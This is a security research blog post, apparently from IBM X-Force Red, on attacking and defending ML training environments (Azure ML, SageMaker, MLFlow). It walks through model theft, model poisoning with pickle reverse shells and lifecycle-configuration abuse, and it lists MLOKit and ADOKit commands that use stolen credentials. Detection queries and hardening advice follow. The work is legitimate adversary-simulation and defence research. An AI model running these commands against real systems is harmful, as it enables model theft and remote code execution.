Adversary Simulation
IBM X-Force Red
Artificial intelligence (AI) is quickly becoming a strategic investment for companies of all sizes and industries, such as automotive, healthcare and financial services. To fulfill this rapidly developing business need, machine learning (ML) models need to be developed and deployed to support these AI-integrated products and services via the machine learning operations (MLOps) lifecycle. The most critical phase within the MLOps lifecycle is when the model is being trained within an ML training environment. If an attacker were to gain unauthorized access to any components within the ML training environment, this could affect the confidentiality, integrity and availability of the models being developed.
This research includes a background on ML training environments and infrastructure, along with detailing different attack scenarios against the various critical components, such as Jupyter notebook environments, cloud compute, model artifact storage and model registries. This blog will outline how to take advantage of the integrations between these various components to facilitate privilege escalation and lateral movement, as well as how to conduct ML model theft and poisoning. In addition to showing these attack scenarios, this blog will describe how to protect and defend these ML training environments.
Prior workThe resources below are prior work related to the content of this research. For the associated prior work, it is described how this X-Force Red research differs from or builds upon that prior work.
Model theft and training data theft from MLOps platformsChris Thompson and I (Brett Hawkins) released a whitepaper in January 2025, which included how to perform model and training data theft against Azure ML, BigML and Vertex AI model registries. This new X-Force Red research differs as it focuses on how to perform model theft attacks against Amazon SageMaker and MLFlow, along with how to conduct lateral movement and abuse the integrations between different infrastructure components involved within ML training environments. Additionally, this includes new research on conducting model poisoning attacks against Azure ML and Amazon SageMaker to gain code execution, along with updates to the X-Force Red MLOKit tool to automate these attacks.
Abuse of SageMaker notebook lifecycle configurationsOr Azarzar released a blog post that showed how to abuse SageMaker notebook instance lifecycle configurations to obtain a reverse shell within a SageMaker cloud compute instance. Or’s research included how to conduct this attack using the AWS web interface. This new X-Force Red research details how to conduct this same attack in an automated method via a new module in the X-Force Red MLOKit tool.
Strengthen your security intelligenceStay ahead of threats with news and insights on security, AI and more, weekly in the Think Newsletter.
Machine learning technology use casesMachine Learning (ML) is used in multiple industries as part of key business products and service offerings. A listing of example use cases for various industries is listed below:
Automotive industry
Healthcare industry
Financial services industry
To develop and deploy ML models that are utilized by the ML technologies previously mentioned, the Machine Learning Operations (MLOps) lifecycle is used. MLOps is the practice of deploying and maintaining ML models in a secure, efficient and reliable way. The goal of MLOps is to provide a consistent and automated process to be able to rapidly get an ML model into production for use by ML technologies.
An MLOps lifecycle exists for an ML model to go from design all the way to deployment. For a list of popular open source and commercial MLOps platforms, see this resource. In this research, we will focus on attacking and protecting the ML training environment that is involved in the “Develop/Build” phase of the MLOps lifecycle.
The attack scenarios that will be shown in this research against ML training environments rely on obtaining valid credential material. Common methods for obtaining the credential material required to access ML training environments include, but are not limited to, file shares, intranet sites (e.g., internal wikis), user workstations, public resources (e.g., GitHub), social engineering, public data breach leaks or unauthenticated access. Additionally, attackers will utilize various privilege escalation techniques within corporate networks to help facilitate the retrieval of credentials, such as escalating privileges in Active Directory or cloud environments, for example.
ML training environment infrastructureThere are several key pieces of infrastructure involved in an ML training environment. These include:
Some of the specific infrastructure components that will be shown or mentioned in this research are listed below.
Attacking ML training environments Key components—Attacker perspectiveThere are several components included within ML training environments that can be targeted by an attacker. These components are highly privileged and can provide an attacker with sensitive access that would facilitate lateral movement, privilege escalation, training data and model theft or manipulation.
Several attack scenarios will be detailed below that involve attacking ML training environments. These are attack scenarios that have been performed by myself and others on our team as part of Adversary Simulation engagements for our clients.
In this attack scenario, an attacker has gained initial access to an organization via a phishing attack and escalated their privileges within the Active Directory environment. Using their elevated privileges, the attacker has performed lateral movement to a data scientist workstation and obtained their Azure ML credentials from the workstation.
After obtaining initial access, the compromised data scientist credentials can be used to log in to Azure ML, where there is a Jupyter notebook available and configured to send ML training model artifacts to MLFlow.
In this case, the data scientist has the credentials to MLFlow present in cleartext within the Jupyter notebook. Therefore, these credentials can be stolen from this Jupyter notebook.
These MLFlow credentials from the Jupyter notebook can then be used to gain initial access to the MLFlow tracking server.
Scenario 2: MLFlow - Model theft from model registryAfter gaining initial access to an MLFlow tracking server, as shown in the previous attack scenario, the MLFlow REST API can be abused to perform model theft from the MLFlow model registry. This can also be conducted in an automated fashion using MLOKit. First, reconnaissance of the available models within the MLFlow model registry can be conducted using the command below.
MLOKit.exe list-models /platform:mlflow /credential:username;password /url:[MLFLOW_URL]Then, a given model can be downloaded from the model registry by the model ID (model name in this case). This will download all associated model artifacts for a model.
MLOKit.exe download-model /platform:mlflow /credential:username;password /url:[MLFLOW_URL] /model-id:[MODEL_ID]This demonstrates performing model theft from an MLFlow model registry after stealing credentials from a Jupyter notebook within Azure ML.
If model artifacts are stolen, an attacker can take advantage of these artifacts in the following ways:
In this attack scenario, an attacker has gained initial access to an organization via a phishing attack. From there, the attacker has performed internal reconnaissance and discovered a personal access token (PAT) for the organization’s Azure DevOps instance on a file share.
A stolen PAT for Azure DevOps can be used to perform reconnaissance of the available repositories and search for repositories that have MLFlow project files. This can be conducted with a tool such as ADOKit.
ADOKit.exe searchfile /credential:PAT /url:https://dev.azure.com/organizationName /search:MLprojectAfter a repository is discovered, it can be cloned using the stolen PAT.
The code within one of the MLFlow project files can be modified in one of the repositories to provide a reverse shell when executed within the ML training environment, which is SageMaker in this instance. As an alternative to modifying the MLProject file, any script file can be modified, such as a Python script, for example.
It is common for automation to be set up in an MLOps training environment to pull updated code from the affected SCM repository and run it. Another option could be MLOps personnel pulling in code changes on an ad-hoc or regularly scheduled basis. In either of these scenarios, the updated MLProject file would be pulled in and run malicious commands, as demonstrated below.
This causes the reverse shell command to be run on the SageMaker compute instance, which provides direct access to the system.
While on the cloud compute system, access to sensitive credentials can be obtained via environment variables, which frequently include the credentials to other ML training infrastructure, such as an MLFlow tracking server, for example, or enterprise data lakes. Other data that can be included on the SageMaker compute instance is third-party API credentials or even training data.
Scenario 4: SageMaker - Lateral movement to cloud compute using malicious lifecycle configurationThis example scenario starts with an attacker discovering AWS security credentials within a public GitHub account for an organization. From there, MLOKit can be used to access the organization’s AWS environment using stolen credentials. To perform this attack, the stolen AWS security credentials will need the AmazonSageMakerFullAccess permission from the AWS managed policy for SageMaker. This means the credentials need administrative access to SageMaker. These are the minimum privileges required.
The MLOKit command below can be run to list all notebook instances available within SageMaker.
MLOKit.exe list-notebooks /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /region:[REGION]After discovering an identified notebook instance where code execution is desired, the command below can be run. This will stop the target notebook, create a lifecycle configuration based on the script you provide, assign the lifecycle configuration file to the target notebook and finally restart the target notebook. The bash script file, in this instance, is a reverse shell.
MLOKit.exe add-notebook-trigger /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /notebook-name:[NOTEBOOK_NAME] /script:[PATH_TO_SCRIPT] /region:[REGION]Upon the target notebook instance starting, it will load the malicious lifecycle configuration that provides a reverse shell to the SageMaker cloud compute instance as the root user account.
As mentioned in the previous attack path, access to SageMaker cloud compute can facilitate the discovery of sensitive credentials via environment variables and script files, or proprietary ML training code and data.
Scenario 5: SageMaker - Model theft from model registryThis example scenario starts with an attacker discovering AWS security credentials within a public GitLab account for an organization. To perform this attack, the stolen AWS security credentials will need the AmazonS3ReadOnlyAccess permission from the AWS managed policy for S3 and the AmazonSageMakerReadOnly permission from the AWS managed policy for SageMaker. This means the credentials need read-only access to SageMaker and S3. These are the minimum privileges required.
MLOKit can be used to list all models that are available within the SageMaker model registry after authenticating with the stolen AWS security credentials.
MLOKit.exe list-models /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /region:[REGION]Supply a model name from the previous MLOKit command as the /model-id: argument. This will locate and download all model artifacts for the registered model.
MLOKit.exe download-model /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /model-id:[MODEL_ID] /region:[REGION]As you can see, we have downloaded all model artifacts and can extract them locally.
Scenario 6: SageMaker - Model poisoning to gain code executionIn this scenario, we will be poisoning the previously stolen model from SageMaker. To perform this attack, the compromised AWS security credentials will need the AmazonS3FullAccess permission from the AWS managed policy for S3 and the AmazonSageMakerReadOnly permission from the AWS managed policy for SageMaker. This means the credentials will need read/write access to S3 and read-only access to SageMaker. These are the minimum privileges required.
After extracting model artifacts, list any serialized model formats that support code execution upon loading. In this example, we discover that this stolen model is using Pickle-based models and take note of one of the model.pkl files. The model.pkl file will be the file that is poisoned to include a malicious command, such as a reverse shell.
To poison the serialized model file (model.pkl), this Python code snippet can be used. An alternative approach is appending this reverse shell to an existing model, rather than completely replacing the model. This is just a simple proof of concept. When conducting this attack as part of a security assessment, it is recommended to perform this in a non-production environment to reduce business impact while still testing security controls against the poisoning of models within SageMaker. Other tools that can be used to create malicious model files include:
After adding the malicious reverse shell code to the model.pkl file, MLOKit can be used to upload the poisoned model to the associated model artifact location for a given registered model. First, the poisoned model needs to be packaged up. The 7-zip command below is an example of packaging the poisoned model into a file named model.tar.gz.
"C:\Program Files\7-Zip\7z.exe" a -ttar -so model.tar * | "C:\Program Files\7-Zip\7z.exe" a -si model.tar.gzAfter packaging the poisoned model, it can be uploaded to the appropriate model artifact location via MLOKit.
MLOKit.exe poison-model /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /model-id:[MODEL_ID] /source-dir:[SOURCE_FILES_PATH] /region:[REGION]Once this model is deployed either within a training or production environment, the poisoned model will run the reverse shell code that will provide an interactive command shell to the model deployment endpoint.
Scenario 7: Azure ML - Model poisoning to gain code executionThis example attack scenario starts with an attacker performing a device code phishing attack against a data scientist. This allows the attacker to obtain an Azure access token as the targeted data scientist user.
With an Azure access token, the Azure ML REST API can be accessed using MLOKit.
MLOKit.exe check /platform:azureml /credential:[ACCESS_TOKEN]From there, all the available workspaces can be listed for each Azure subscription.
MLOKit.exe list-projects /platform:azureml /subscription-id:[SUBSCRIPTION_ID] /credential:[ACCESS_TOKEN]After performing workspace reconnaissance, models within each workspace can be listed.
MLOKit.exe list-models /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME]After performing model reconnaissance, a model can be downloaded from Azure ML by supplying the model ID from the output in the previous command using MLOKit. Within the directory that was created when downloading the model, take note of any serialized model file formats that support code execution upon load. In this case, the registered model is using a Pickle-based model. The model.pkl file will be the file that is poisoned to include a malicious command, such as a reverse shell.
MLOKit.exe download-model /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME] /model-id:[MODEL_ID]To poison the serialized model file (model.pkl), this Python code snippet can be used. This is the same Python code snippet as below, which adds a reverse shell to the model.pkl file and then replaces the existing model file. An alternative approach is appending this reverse shell to an existing model, rather than completely replacing the model. This is just a simple proof of concept. When conducting this attack as part of a security assessment, it is recommended to perform this in a non-production environment to reduce business impact while still testing security controls against the poisoning of models within Azure ML.
After adding the malicious reverse shell code to the model.pkl file, MLOKit can be used to upload the poisoned model artifacts to the associated datastore for the model.
MLOKit.exe poison-model /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME] /model-id:[MODEL_ID] /source-dir:[SOURCE_DIRECTORY]Once this model is deployed either within a training or production environment, the poisoned model will run the reverse shell code that will provide interactive command shell access to the Azure ML deployment endpoint.
If an attacker compromises an Azure ML deployment endpoint, this access can be used for:
Defensive guidance will be outlined below to help defend and protect your ML training environment with regard to users, Jupyter notebook environments, cloud compute instances, model artifact storage and model registries.
ML training environment usersPersonnel who interact with ML training environments should be classified as business-critical personnel who have highly sensitive access. Due to this, their access should be properly secured, as would any other type of sensitive user, such as a database administrator or Active Directory administrator, for example.
Below are a couple of guides on securing your Jupyter notebook environment.
A summary of the guidance from the above resources is:
Regardless of your cloud provider, you should consider the below items when configuring your compute instances.
Below is high-level guidance for protecting your model artifact storage and registry:
I have developed KQL queries and CloudTrail queries that can be used to detect the attack scenarios shown in this research against Azure ML and SageMaker, respectively. For MLFlow, I supply filters that can be applied to the gunicorn logs. The below resources can be referenced for configuration guidance of these platforms.
The KQL query below will query the Azure storage blob logs, Azure ML model and datastore events, and then will join events from these tables by the subscription ID and resource group. The specific operations the query is looking for between these log schemas are:
This can be indicative of a compromised account being used to download and then replace model artifacts.
The image below shows the results of the KQL query, which includes the compromised user account, model artifacts that were replaced, and the name of the model and datastore the model artifacts were associated with.
Amazon SageMaker – Model theftThe query below can be used to identify model reconnaissance and theft activities. This query will identify where any userIdentity.arn and sourceIpAddress has performed the ListModels, DescribeModel, GetObject and GetBucketVersioning events within a 24-hour period. This can be indicative of an attacker using a compromised account to list all models within SageMaker and then choosing to download one.
The image below shows the results from the query that successfully identifies the model theft attack by the compromised data-scientist user account.
Amazon SageMaker – Model poisoningThe query below can be used to identify potential model poisoning activities within SageMaker. This query will identify any userIdentity.arn and sourceIpAddress that performed the ListModels, DescribeModel, GetObject, PutObject and GetBucketVersioning events within a 24-hour period. This can be indicative of an attacker using a compromised account to list all models within SageMaker, download a model, and then upload a new model by replacing model artifacts.
The image below shows the results from the query that successfully identifies the model poisoning attack by the compromised data-scientist user account.
Amazon SageMaker – Malicious lifecycle configurationThe below query can be used to identify potential abuse of a malicious lifecycle configuration. This query will identify any userIdentity.arn and sourceIpAddress that performed the ListNotebookInstances, UpdateNotebookInstance, CreateNotebookInstanceLifecycleConfig, StopNotebookInstance and StartNotebookInstance events within a 24-hour period. This can be indicative of an attacker creating a malicious lifecycle configuration to be assigned to a SageMaker notebook instance.
SageMakerMaliciousLifecycleConfig.sql
The image below shows the results from the query that successfully identifies the abuse of a notebook lifecycle config by the compromised data-scientist user account.
MLFlowTo ensure that proper logging is conducted for the abuse of the MLFlow REST API, ensure that you add the below additional options when starting your MLFlow tracking server.
--gunicorn-opts “--log-level info --access-logfile access.log --error-logfile error.log --capture-output --enable-stdio-inheritance”Ensure these logs are being sent to a centralized Security Information and Event Management (SIEM) system where they can be correlated to detect anomalous behavior. Once you have the proper logging, the below search strings can be used to correlate REST API actions with potential misuse.
MLOKit Usage
grep –i mlokit access.logModel Recon
grep –i /api/2.0/mlflow/model-versions/search access.logModel Theft
grep –i /get-artifact access.logML training environments are quickly becoming populated with highly sensitive and business-critical data, which will be targeted by attackers. As security practitioners, it is vital that we understand these environments and systems so we can protect them. If access to these ML training environments falls into the wrong hands, there can be a significant impact on the businesses and consumers that depend on the products and services that use the models developed in these environments. It is X-Force Red’s goal that this research brings more attention and inspires future research on defending these ML training environments.
A special thank you to the below people for giving feedback on this research and providing blog post content review:
RetroSearch is an open source project built by @garambo | Open a GitHub Issue
Search and Browse the WWW like it's 1997 | Search results from DuckDuckGo
HTML:
3.2
| Encoding:
UTF-8
| Version:
0.7.4